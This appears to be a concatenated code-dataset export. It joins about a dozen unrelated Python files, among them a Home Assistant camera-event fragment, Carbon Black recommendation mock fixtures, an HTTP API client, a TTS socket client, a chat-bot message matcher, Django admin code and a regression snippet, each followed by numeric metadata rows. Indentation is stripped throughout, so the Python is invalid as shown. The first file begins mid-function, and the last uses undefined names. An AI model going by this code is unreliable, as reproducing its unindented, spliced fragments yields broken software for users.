if hass.data[DOMAIN][entry.entry_id]["motionSensorCreated"]:
await hass.config_entries.async_forward_entry_unload(entry, "binary_sensor")
hass.data[DOMAIN][entry.entry_id]["motionSensorCreated"] = False
if motionSensor:
await setupOnvif(hass, entry, host, username, password)
async def setupOnvif(hass, entry, host, username, password):
hass.data[DOMAIN][entry.entry_id]["eventsDevice"] = await initOnvifEvents(
hass, host, username, password
)
if hass.data[DOMAIN][entry.entry_id]["eventsDevice"]:
hass.data[DOMAIN][entry.entry_id]["events"] = EventManager(
hass,
hass.data[DOMAIN][entry.entry_id]["eventsDevice"],
f"{entry.entry_id}_tapo_events",
)
hass.data[DOMAIN][entry.entry_id]["eventsSetup"] = await setupEvents(
hass, entry
)
async def setupEvents(hass, entry):
if not hass.data[DOMAIN][entry.entry_id]["events"].started:
events = hass.data[DOMAIN][entry.entry_id]["events"]
if await events.async_start():
if not hass.data[DOMAIN][entry.entry_id]["motionSensorCreated"]:
hass.data[DOMAIN][entry.entry_id]["motionSensorCreated"] = True
hass.async_create_task(
hass.config_entries.async_forward_entry_setup(
entry, "binary_sensor"
)
)
return True
else:
return False
| 34.93299 | 86 | 0.665044 | 735 | 6,777 | 5.910204 | 0.22585 | 0.029466 | 0.044199 | 0.065608 | 0.293738 | 0.269337 | 0.234346 | 0.080571 | 0.049724 | 0 | 0 | 0.00271 | 0.237716 | 6,777 | 193 | 87 | 35.11399 | 0.838173 | 0 | 0 | 0.156627 | 0 | 0 | 0.110979 | 0.024596 | 0 | 0 | 0 | 0 | 0 | 1 | 0.006024 | false | 0.114458 | 0.066265 | 0.006024 | 0.114458 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
d5b2ddd3598b303bcb8230980f8ef5b2b4388ef0 | 5,712 | py | Python | src/tests/unit/fixtures/endpoint_standard/mock_recommendation.py | fslds/carbon-black-cloud-sdk-python | 248a3c63d6b36d6fcdbcb3f51fb7751f062ed372 | [
"MIT"
] | 24 | 2020-10-16T22:07:38.000Z | 2022-03-24T14:58:03.000Z | src/tests/unit/fixtures/endpoint_standard/mock_recommendation.py | fslds/carbon-black-cloud-sdk-python | 248a3c63d6b36d6fcdbcb3f51fb7751f062ed372 | [
"MIT"
] | 63 | 2020-10-26T18:26:15.000Z | 2022-03-31T17:31:02.000Z | src/tests/unit/fixtures/endpoint_standard/mock_recommendation.py | fslds/carbon-black-cloud-sdk-python | 248a3c63d6b36d6fcdbcb3f51fb7751f062ed372 | [
"MIT"
] | 10 | 2020-11-09T11:54:23.000Z | 2022-03-24T20:44:00.000Z | """Mock responses for recommendations."""
SEARCH_REQ = {
"criteria": {
"policy_type": ['reputation_override'],
"status": ['NEW', 'REJECTED', 'ACCEPTED'],
"hashes": ['111', '222']
},
"rows": 50,
"sort": [
{
"field": "impact_score",
"order": "DESC"
}
]
}
SEARCH_RESP = {
"results": [
{
"recommendation_id": "91e9158f-23cc-47fd-af7f-8f56e2206523",
"rule_type": "reputation_override",
"policy_id": 0,
"new_rule": {
"override_type": "SHA256",
"override_list": "WHITE_LIST",
"sha256_hash": "32d2be78c00056b577295aa0943d97a5c5a0be357183fcd714c7f5036e4bdede",
"filename": "XprotectService",
"application": {
"type": "EXE",
"value": "FOO"
}
},
"workflow": {
"status": "NEW",
"changed_by": "rbaratheon@example.com",
"create_time": "2021-05-18T16:37:07.000Z",
"update_time": "2021-08-31T20:53:39.000Z",
"comment": "Ours is the fury"
},
"impact": {
"org_adoption": "LOW",
"impacted_devices": 45,
"event_count": 76,
"impact_score": 0,
"update_time": "2021-05-18T16:37:07.000Z"
}
},
{
"recommendation_id": "bd50c2b2-5403-4e9e-8863-9991f70df026",
"rule_type": "reputation_override",
"policy_id": 0,
"new_rule": {
"override_type": "SHA256",
"override_list": "WHITE_LIST",
"sha256_hash": "0bbc082cd8b3ff62898ad80a57cb5e1f379e3fcfa48fa2f9858901eb0c220dc0",
"filename": "sophos ui.msi"
},
"workflow": {
"status": "NEW",
"changed_by": "tlannister@example.com",
"create_time": "2021-05-18T16:37:07.000Z",
"update_time": "2021-08-31T20:53:09.000Z",
"comment": "Always pay your debts"
},
"impact": {
"org_adoption": "HIGH",
"impacted_devices": 8,
"event_count": 25,
"impact_score": 0,
"update_time": "2021-05-18T16:37:07.000Z"
}
},
{
"recommendation_id": "0d9da444-cfa7-4488-9fad-e2abab099b68",
"rule_type": "reputation_override",
"policy_id": 0,
"new_rule": {
"override_type": "SHA256",
"override_list": "WHITE_LIST",
"sha256_hash": "2272c5221e90f9762dfa38786da01b36a28a7da5556b07dec3523d1abc292124",
"filename": "mimecast for outlook 7.8.0.125 (x86).msi"
},
"workflow": {
"status": "NEW",
"changed_by": "estark@example.com",
"create_time": "2021-05-18T16:37:07.000Z",
"update_time": "2021-08-31T15:13:40.000Z",
"comment": "Winter is coming"
},
"impact": {
"org_adoption": "MEDIUM",
"impacted_devices": 45,
"event_count": 79,
"impact_score": 0,
"update_time": "2021-05-18T16:37:07.000Z"
}
}
],
"num_found": 3
}
ACTION_INIT = {
"recommendation_id": "0d9da444-cfa7-4488-9fad-e2abab099b68",
"rule_type": "reputation_override",
"policy_id": 0,
"new_rule": {
"override_type": "SHA256",
"override_list": "WHITE_LIST",
"sha256_hash": "2272c5221e90f9762dfa38786da01b36a28a7da5556b07dec3523d1abc292124",
"filename": "mimecast for outlook 7.8.0.125 (x86).msi"
},
"workflow": {
"status": "NEW",
"changed_by": "estark@example.com",
"create_time": "2021-05-18T16:37:07.000Z",
"update_time": "2021-08-31T15:13:40.000Z",
"comment": "Winter is coming"
},
"impact": {
"org_adoption": "MEDIUM",
"impacted_devices": 45,
"event_count": 79,
"impact_score": 0,
"update_time": "2021-05-18T16:37:07.000Z"
}
}
ACTION_REQS = [
{
"action": "ACCEPT",
"comment": "Alpha"
},
{
"action": "RESET"
},
{
"action": "REJECT",
"comment": "Charlie"
},
]
ACTION_REFRESH_SEARCH = {
"criteria": {
"status": ['NEW', 'REJECTED', 'ACCEPTED'],
"policy_type": ['reputation_override']
},
"rows": 50
}
ACTION_SEARCH_RESP = {
"results": [ACTION_INIT],
"num_found": 1
}
ACTION_REFRESH_STATUS = ['ACCEPTED', 'NEW', 'REJECTED']
ACTION_INIT_ACCEPTED = {
"recommendation_id": "0d9da444-cfa7-4488-9fad-e2abab099b68",
"rule_type": "reputation_override",
"policy_id": 0,
"new_rule": {
"override_type": "SHA256",
"override_list": "WHITE_LIST",
"sha256_hash": "2272c5221e90f9762dfa38786da01b36a28a7da5556b07dec3523d1abc292124",
"filename": "mimecast for outlook 7.8.0.125 (x86).msi"
},
"workflow": {
"status": "ACCEPTED",
"ref_id": "e9410b754ea011ebbfd0db2585a41b07",
"changed_by": "estark@example.com",
"create_time": "2021-05-18T16:37:07.000Z",
"update_time": "2021-08-31T15:13:40.000Z",
"comment": "Winter is coming"
},
"impact": {
"org_adoption": "MEDIUM",
"impacted_devices": 45,
"event_count": 79,
"impact_score": 0,
"update_time": "2021-05-18T16:37:07.000Z"
}
}
| 31.043478 | 98 | 0.500525 | 499 | 5,712 | 5.517034 | 0.266533 | 0.043589 | 0.036324 | 0.054486 | 0.671268 | 0.652016 | 0.641482 | 0.641482 | 0.641482 | 0.641482 | 0 | 0.179021 | 0.345763 | 5,712 | 183 | 99 | 31.213115 | 0.557667 | 0.006127 | 0 | 0.494253 | 0 | 0 | 0.495151 | 0.16505 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d5b52472e7e5df33cf0c5865ffdc86c08a3ea627 | 1,881 | py | Python | dhf_wrapper/base_client.py | Enflow-io/dhf-pay-python | 7c32461d3b2a5018151b2a16a0cc0ad6850b88b1 | [
"Apache-2.0"
] | null | null | null | dhf_wrapper/base_client.py | Enflow-io/dhf-pay-python | 7c32461d3b2a5018151b2a16a0cc0ad6850b88b1 | [
"Apache-2.0"
] | null | null | null | dhf_wrapper/base_client.py | Enflow-io/dhf-pay-python | 7c32461d3b2a5018151b2a16a0cc0ad6850b88b1 | [
"Apache-2.0"
] | null | null | null | from typing import Optional, Callable
import requests
from requests.auth import AuthBase
from requests.exceptions import RequestException
class BearerAuth(AuthBase):
def __init__(self, token):
self.token = token
def __call__(self, r):
r.headers['Authorization'] = f'Bearer {self.token}'
return r
class ServiceClient:
DEFAULT_MAX_RETRIES = 0
def __init__(
self,
base_url: str,
token: Optional[str] = None,
):
self.base_url = base_url.rstrip("/")
self.token = token
self.session = self._create_client_session()
def _dispose(self):
"""
Class method to close user session
"""
self.session.close()
def _create_client_session(self):
"""
Class method to create client session
"""
session = requests.Session()
session.auth = self._get_http_auth()
return session
def _get_http_auth(self):
"""
Class method to resolve http authentication
"""
if self.token:
return BearerAuth(self.token)
def make_full_url(self, path: str) -> str:
"""
Class method to make full url
:param path: str
:return: str
"""
return f"{self.base_url}{path}"
def _make_request(self, request: Callable, retries=DEFAULT_MAX_RETRIES, **kwargs) -> dict:
"""
Class method to make request
:param request: Callable
:return: dict
"""
try:
with request(**kwargs) as resp:
resp.raise_for_status()
return resp.json()
except RequestException as e:
if retries > 0 and e.request.status >= 500:
return self._make_request(request=request, retries=retries - 1, **kwargs)
else:
raise e
| 25.767123 | 94 | 0.576289 | 208 | 1,881 | 5.014423 | 0.322115 | 0.051774 | 0.06232 | 0.048897 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004762 | 0.330144 | 1,881 | 72 | 95 | 26.125 | 0.823016 | 0.129718 | 0 | 0.04878 | 0 | 0 | 0.036266 | 0.014103 | 0 | 0 | 0 | 0 | 0 | 1 | 0.195122 | false | 0 | 0.097561 | 0 | 0.512195 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
d5b58f8a34e9535374ceecc69e4b47358c97ddb9 | 1,395 | py | Python | flametree/utils.py | Edinburgh-Genome-Foundry/Flametree | a189de5d83ca1eb3526a439320e41df9e2a1162e | [
"MIT"
] | 165 | 2017-02-04T00:40:01.000Z | 2021-06-08T03:51:58.000Z | flametree/utils.py | Edinburgh-Genome-Foundry/Flametree | a189de5d83ca1eb3526a439320e41df9e2a1162e | [
"MIT"
] | 8 | 2017-02-10T00:47:09.000Z | 2021-05-30T04:38:41.000Z | flametree/utils.py | Edinburgh-Genome-Foundry/Flametree | a189de5d83ca1eb3526a439320e41df9e2a1162e | [
"MIT"
] | 19 | 2017-02-09T17:38:31.000Z | 2021-03-23T16:04:32.000Z | import os
import shutil
from .ZipFileManager import ZipFileManager
from .DiskFileManager import DiskFileManager
from .Directory import Directory
import string
printable = set(string.printable) - set("\x0b\x0c")
def is_hex(s):
return any(c not in printable for c in s)
def file_tree(target, replace=False):
"""Open a connection to a file tree which can be either a disk folder, a
zip archive, or an in-memory zip archive.
Parameters
----------
target
Either the path to a target folder, or a zip file, or '@memory' to write
a zip file in memory (at which case a string of the zip file is returned)
If the target is already a flametree directory, it is returned as-is.
replace
If True, will remove the target if it already exists. If False, new files
will be written inside the target and some files may be overwritten.
"""
if isinstance(target, Directory):
return target
if (not isinstance(target, str)) or is_hex(target):
return Directory(file_manager=ZipFileManager(source=target))
elif target == "@memory":
return Directory("@memory", file_manager=ZipFileManager("@memory"))
elif target.lower().endswith(".zip"):
return Directory(target, file_manager=ZipFileManager(target, replace=replace))
else:
return Directory(target, file_manager=DiskFileManager(target))
| 32.44186 | 86 | 0.703226 | 195 | 1,395 | 4.994872 | 0.384615 | 0.061602 | 0.077002 | 0.051335 | 0.065708 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001818 | 0.21147 | 1,395 | 42 | 87 | 33.214286 | 0.883636 | 0.373477 | 0 | 0 | 0 | 0 | 0.040097 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.3 | 0.05 | 0.7 | 0.1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
d5b74bc11e212074f29e2869fb5c41c2c3cd585b | 628 | py | Python | audio/audio_client.py | artigianitecnologici/marrtino_apps | b58bf4daa1d06db2f1c8a47be02b29948d41f48d | [
"BSD-4-Clause"
] | null | null | null | audio/audio_client.py | artigianitecnologici/marrtino_apps | b58bf4daa1d06db2f1c8a47be02b29948d41f48d | [
"BSD-4-Clause"
] | null | null | null | audio/audio_client.py | artigianitecnologici/marrtino_apps | b58bf4daa1d06db2f1c8a47be02b29948d41f48d | [
"BSD-4-Clause"
] | null | null | null | import sys
import socket
import time
ip = '127.0.0.1'
port = 9001
if (len(sys.argv)>1):
ip = sys.argv[1]
if (len(sys.argv)>2):
port = int(sys.argv[2])
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ip,port))
sock.send('bip\n\r')
data = sock.recv(80)
print data
sock.send('TTS[it-IT] ciao, come stai?\n\r')
data = sock.recv(80)
print data
sock.send('TTS[en-US] very well, thank you!\n\r')
data = sock.recv(80)
print data
sock.send('TTS default language is english!\n\r')
data = sock.recv(80)
print data
sock.send('bop\n\r')
data = sock.recv(80)
print data
time.sleep(1)
sock.close()
| 14.604651 | 56 | 0.66879 | 120 | 628 | 3.483333 | 0.383333 | 0.172249 | 0.07177 | 0.119617 | 0.397129 | 0.397129 | 0.397129 | 0.397129 | 0.337321 | 0.337321 | 0 | 0.046642 | 0.146497 | 628 | 42 | 57 | 14.952381 | 0.733209 | 0 | 0 | 0.357143 | 0 | 0 | 0.200957 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.107143 | null | null | 0.178571 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d5b8242c634dcf60f9e745fdadd1c86fe716bf6e | 3,461 | py | Python | qmotor/message/matcher.py | yulinfeng000/qmotor | ad3e9eea291f5b87e09fcdd5e42f1eb13d752565 | [
"MIT"
] | null | null | null | qmotor/message/matcher.py | yulinfeng000/qmotor | ad3e9eea291f5b87e09fcdd5e42f1eb13d752565 | [
"MIT"
] | null | null | null | qmotor/message/matcher.py | yulinfeng000/qmotor | ad3e9eea291f5b87e09fcdd5e42f1eb13d752565 | [
"MIT"
] | null | null | null | from abc import ABC, abstractmethod
from typing import List
from .common import (
AtCell,
BasicMessage,
GroupMessage,
FriendMessage,
MsgCellType,
MessageType,
PlainCell,
)
from ..utils import is_str_blank, str_contains
class MsgMatcher(ABC):
def msg_chain_from_ctx(self, ctx):
return BasicMessage(ctx.msg).messageChain()
def get_cell_type(self, msg_cell):
return msg_cell.get("type", None)
@abstractmethod
def match(self, ctx) -> bool:
pass
class GroupMsg(MsgMatcher):
def match(self, ctx) -> bool:
return BasicMessage(ctx.msg).type() == MessageType.GroupMessage
class FriendMsg(MsgMatcher):
def match(self, ctx) -> bool:
return BasicMessage(ctx.msg).type() == MessageType.FriendMessage
class TempMsg(MsgMatcher):
def match(self, ctx) -> bool:
return BasicMessage(ctx.msg).type() == MessageType.TempMessage
class AtMsg(GroupMsg):
def match(self, ctx) -> bool:
if not super().match(ctx):
return False
msg_chain = self.msg_chain_from_ctx(ctx)
return self.get_cell_type(msg_chain[1]) == MsgCellType.At
class AtMeMsg(AtMsg):
me_qq: int
def __init__(self, me_qq) -> None:
super(AtMeMsg, self).__init__()
self.me_qq = me_qq
def match(self, ctx) -> bool:
if not super().match(ctx):
return False
msg_chain = GroupMessage(ctx.msg).messageChain()
at = AtCell(msg_chain[1])
return self.me_qq == at.target()
class JustAtMeMsg(AtMeMsg):
def __init__(self, me_qq) -> None:
super(JustAtMeMsg, self).__init__(me_qq)
def match(self, ctx) -> bool:
if not super().match(ctx):
return False
msg_chain = self.msg_chain_from_ctx(ctx)
plain = PlainCell(msg_chain[2])
return is_str_blank(plain.text())
class AtMeCmdMsg(AtMeMsg):
cmd_list: List[str]
def __init__(self, me_qq, cmd) -> None:
super(AtMeCmdMsg, self).__init__(me_qq)
self.cmd_list = cmd
def match(self, ctx) -> bool:
if not super().match(ctx):
return False
msg_chain = self.msg_chain_from_ctx(ctx)
return str_contains(PlainCell(msg_chain[2]).text(), self.cmd_list)
class SpecificFriendMsg(FriendMsg):
friend_qq: int
def __init__(self, friend_qq) -> None:
super(SpecificFriendMsg, self).__init__()
self.friend_qq = friend_qq
def match(self, ctx) -> bool:
if not super().match(ctx):
return False
return self.friend_qq == FriendMessage(ctx.msg).friend_qq()
class SpecificGroupMsg(GroupMsg):
group_qq: int
def __init__(self, group_qq) -> None:
super(SpecificGroupMsg, self).__init__()
self.group_qq = group_qq
def match(self, ctx) -> bool:
if not super().match(ctx):
return False
return self.group_qq == GroupMessage(ctx.msg).group_qq()
if __name__ == "__main__":
msg_matcher = JustAtMeMsg(123)
class Ctx:
def __init__(self, msg) -> None:
self.msg = msg
msg = {
"type": "GroupMessage",
"sender": {"id": 123, "nickname": "", "remark": ""},
"messageChain": [
{"type": "Source", "id": 123456, "time": 123456},
{"type": "At", "target": 1234, "display": "@Mirai"},
{"type": "Plain", "text": " "},
],
}
print(msg_matcher.match(Ctx(msg)))
| 25.637037 | 74 | 0.612251 | 422 | 3,461 | 4.760664 | 0.182464 | 0.047785 | 0.059731 | 0.074664 | 0.374813 | 0.339472 | 0.339472 | 0.31558 | 0.31558 | 0.31558 | 0 | 0.010125 | 0.258018 | 3,461 | 134 | 75 | 25.828358 | 0.772196 | 0 | 0 | 0.27551 | 0 | 0 | 0.033805 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.183673 | false | 0.010204 | 0.040816 | 0.05102 | 0.55102 | 0.010204 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
d5b96915a161658ab58f977d3518461eda8624b2 | 1,407 | py | Python | main/admin.py | sinahmr/childf | 4e01f46867425b36b6431713b79debf585d69d37 | [
"MIT"
] | null | null | null | main/admin.py | sinahmr/childf | 4e01f46867425b36b6431713b79debf585d69d37 | [
"MIT"
] | null | null | null | main/admin.py | sinahmr/childf | 4e01f46867425b36b6431713b79debf585d69d37 | [
"MIT"
] | null | null | null | from django.contrib import admin
from django.contrib.auth.admin import UserAdmin as DjangoUserAdmin
from django.contrib.auth.models import Group
from django.utils.translation import ugettext_lazy as _
from main.models import UserInfo, User, Child, Volunteer, Donor, Letter, Need, PurchaseForInstitute, PurchaseForNeed, \
Activity, OngoingUserInfo
@admin.register(User)
class UserAdmin(DjangoUserAdmin):
class UserInfoInline(admin.TabularInline):
model = UserInfo
extra = 1
max_num = 1
fieldsets = (
(None, {'fields': ('email', 'password')}),
(_('Permissions'), {'fields': ('is_active', 'is_staff', 'is_superuser')}),
(_('Important dates'), {'fields': ('last_login', 'date_joined')}),
)
add_fieldsets = (
(None, {
'classes': ('wide',),
'fields': ('email', 'password1', 'password2'),
}),
)
list_display = ('email', 'userinfo', 'is_staff')
search_fields = ('email', 'userinfo__first_name', 'userinfo__last_name')
ordering = ('email',)
inlines = [UserInfoInline]
admin.site.unregister(Group)
admin.site.register(Child)
admin.site.register(Volunteer)
admin.site.register(Donor)
admin.site.register(Letter)
admin.site.register(Need)
admin.site.register(PurchaseForInstitute)
admin.site.register(PurchaseForNeed)
admin.site.register(Activity)
admin.site.register(OngoingUserInfo)
| 31.977273 | 119 | 0.687278 | 149 | 1,407 | 6.355705 | 0.442953 | 0.095037 | 0.161563 | 0.044351 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003428 | 0.170576 | 1,407 | 43 | 120 | 32.72093 | 0.808055 | 0 | 0 | 0 | 0 | 0 | 0.154229 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.054054 | 0.162162 | 0 | 0.378378 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
d5b9d02c239d39cdf1dcff5670b5cc5e359e73a5 | 2,515 | py | Python | hunting/display/render.py | MoyTW/RL_Arena_Experiment | fb79c67576cd4de3e4a58278b4515098f38fb584 | [
"MIT"
] | null | null | null | hunting/display/render.py | MoyTW/RL_Arena_Experiment | fb79c67576cd4de3e4a58278b4515098f38fb584 | [
"MIT"
] | null | null | null | hunting/display/render.py | MoyTW/RL_Arena_Experiment | fb79c67576cd4de3e4a58278b4515098f38fb584 | [
"MIT"
] | null | null | null | import tdl
import time
import hunting.constants as c
class Renderer:
def __init__(self, main_console=None, level_display_width=c.SCREEN_WIDTH, level_display_height=c.SCREEN_HEIGHT):
if main_console is None:
self.main_console = tdl.init(level_display_width, level_display_height, 'From Renderer Default Constructor')
else:
self.main_console = main_console
self.level_display_width = level_display_width
self.level_display_height = level_display_height
self._level_console = tdl.Console(level_display_width, level_display_height)
def _render_level(self, con, level):
for x in range(level.width):
for y in range(level.height):
if level[x][y].blocks is not False:
self._level_console.draw_rect(x, y, 1, 1, None, bg=[120, 0, 50])
else:
self._level_console.draw_rect(x, y, 1, 1, None, bg=[30, 255, 30])
# TODO: This is pretty hacky!
i = 1
for o in level._all_objects:
if o.faction == '1': # TODO: Better faction implementation!
color = [255, 0, 0]
else:
color = [0, 0, 255]
self._level_console.draw_char(o.x, o.y, i, color)
i += 1
con.blit(self._level_console)
def render_all(self, level):
self._render_level(self.main_console, level)
tdl.flush()
def clear(self, level):
for o in level._all_objects:
self._level_console.draw_char(o.x, o.y, ' ')
def render_event(self, level, event):
if event[c.EVENT_TYPE] == c.MOVEMENT_EVENT:
# Clear previous location
self._level_console.draw_char(event[c.MOVEMENT_PREV_X], event[c.MOVEMENT_PREV_Y], ' ', bg=[0, 15, 7])
# Retrieve faction and color
o = level.get_object_by_id(event[c.OBJ_ID])
if o.faction == '1': # TODO: Better faction implementation!
color = [255, 0, 0]
else:
color = [0, 0, 255]
self._level_console.draw_char(event[c.OBJ_X], event[c.OBJ_Y], o.faction, fg=color)
elif event[c.EVENT_TYPE] == c.OBJECT_DESTRUCTION_EVENT:
self._level_console.draw_char(event[c.OBJ_X], event[c.OBJ_Y], ' ', bg=[0, 15, 7])
# Render
self.main_console.blit(self._level_console)
tdl.flush()
def visualize(level, show_time=1):
Renderer().render_all(level)
time.sleep(show_time) | 36.985294 | 120 | 0.603579 | 350 | 2,515 | 4.08 | 0.234286 | 0.094538 | 0.112045 | 0.098039 | 0.392157 | 0.340336 | 0.261905 | 0.240896 | 0.240896 | 0.218487 | 0 | 0.02784 | 0.285885 | 2,515 | 68 | 121 | 36.985294 | 0.767261 | 0.063221 | 0 | 0.28 | 0 | 0 | 0.01617 | 0 | 0 | 0 | 0 | 0.014706 | 0 | 1 | 0.12 | false | 0 | 0.06 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d5ba579f0453b95d1e8c11d5b88d94830943af72 | 1,732 | py | Python | ideas/models.py | neosergio/hackatrix-api | 27f0180415efa97bd7345d100b314d8807486b67 | [
"Apache-2.0"
] | 1 | 2021-02-12T10:25:28.000Z | 2021-02-12T10:25:28.000Z | ideas/models.py | neosergio/hackatrix-api | 27f0180415efa97bd7345d100b314d8807486b67 | [
"Apache-2.0"
] | 7 | 2020-02-21T00:53:38.000Z | 2022-02-10T12:22:53.000Z | ideas/models.py | neosergio/hackatrix-api | 27f0180415efa97bd7345d100b314d8807486b67 | [
"Apache-2.0"
] | null | null | null | from django.db import models
class Idea(models.Model):
title = models.CharField(max_length=255, unique=True)
description = models.TextField()
author = models.OneToOneField('events.Registrant',
related_name='author_idea',
on_delete=models.CASCADE,
blank=True,
null=True)
written_by = models.ForeignKey('users.User',
related_name='written_idea',
on_delete=models.CASCADE,
blank=True,
null=True)
event = models.ForeignKey('events.Event',
related_name='event_idea',
on_delete=models.CASCADE,
blank=True,
null=True)
is_valid = models.BooleanField(default=False)
max_number_of_participants = models.PositiveIntegerField(default=7)
created_at = models.DateTimeField(auto_now_add=True)
modified_at = models.DateTimeField(auto_now=True)
is_active = models.BooleanField(default=True)
class Meta():
ordering = ['-created_at', '-id']
def __str__(self):
return self.title
class IdeaTeamMember(models.Model):
idea = models.ForeignKey(Idea, related_name='idea_team_member', on_delete=models.CASCADE)
member = models.OneToOneField('events.Registrant', related_name='member_idea', on_delete=models.CASCADE)
class Meta():
ordering = ['idea']
unique_together = ('idea', 'member')
verbose_name = 'Team Member'
verbose_name_plural = 'Groups'
| 39.363636 | 108 | 0.560624 | 165 | 1,732 | 5.660606 | 0.4 | 0.058887 | 0.074946 | 0.11242 | 0.320128 | 0.233405 | 0.134904 | 0.134904 | 0.134904 | 0 | 0 | 0.003527 | 0.345266 | 1,732 | 43 | 109 | 40.27907 | 0.820106 | 0 | 0 | 0.305556 | 0 | 0 | 0.092956 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.027778 | false | 0 | 0.027778 | 0.027778 | 0.527778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
d5bbaeac59cde7e794de669fe4ec0942d528fc8d | 699 | py | Python | Examples/PagesOperations/MovePage.py | groupdocs-merger-cloud/groupdocs-merger-cloud-python-samples | af736c94240eeefef28bd81012c96ab2ea779088 | [
"MIT"
] | null | null | null | Examples/PagesOperations/MovePage.py | groupdocs-merger-cloud/groupdocs-merger-cloud-python-samples | af736c94240eeefef28bd81012c96ab2ea779088 | [
"MIT"
] | null | null | null | Examples/PagesOperations/MovePage.py | groupdocs-merger-cloud/groupdocs-merger-cloud-python-samples | af736c94240eeefef28bd81012c96ab2ea779088 | [
"MIT"
] | null | null | null | # Import modules
import groupdocs_merger_cloud
from Common import Common
# This example demonstrates how to move document page to a new position
class MovePage:
@classmethod
def Run(cls):
pagesApi = groupdocs_merger_cloud.PagesApi.from_config(Common.GetConfig())
options = groupdocs_merger_cloud.MoveOptions()
options.file_info = groupdocs_merger_cloud.FileInfo("WordProcessing/four-pages.docx")
options.output_path = "Output/move-pages.docx"
options.page_number = 1
options.new_page_number = 2
result = pagesApi.move(groupdocs_merger_cloud.MoveRequest(options))
print("Output file path = " + result.path) | 36.789474 | 93 | 0.711016 | 83 | 699 | 5.795181 | 0.53012 | 0.155925 | 0.2079 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00363 | 0.211731 | 699 | 19 | 94 | 36.789474 | 0.869328 | 0.120172 | 0 | 0 | 0 | 0 | 0.115824 | 0.084829 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.153846 | 0 | 0.307692 | 0.076923 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d5bbb325b8069e32756e2756a7150bcc81d9e24f | 221 | py | Python | src/models/predict_model.py | joseluistello/Regression-Analysis-Apple-Data | 85952edd22ba8c382f43357efc510763185fd6d1 | [
"MIT"
] | null | null | null | src/models/predict_model.py | joseluistello/Regression-Analysis-Apple-Data | 85952edd22ba8c382f43357efc510763185fd6d1 | [
"MIT"
] | null | null | null | src/models/predict_model.py | joseluistello/Regression-Analysis-Apple-Data | 85952edd22ba8c382f43357efc510763185fd6d1 | [
"MIT"
] | null | null | null | y_pred=ml.predict(x_test)
print(y_pred)
from sklearn.metrics import r2_score
r2_score(y_test,y_pred)
pred_y_df=pd.DataFrame({'Actual Value':y_test,'Predicted Value':y_pred, 'Difference': y_test-y_pred})
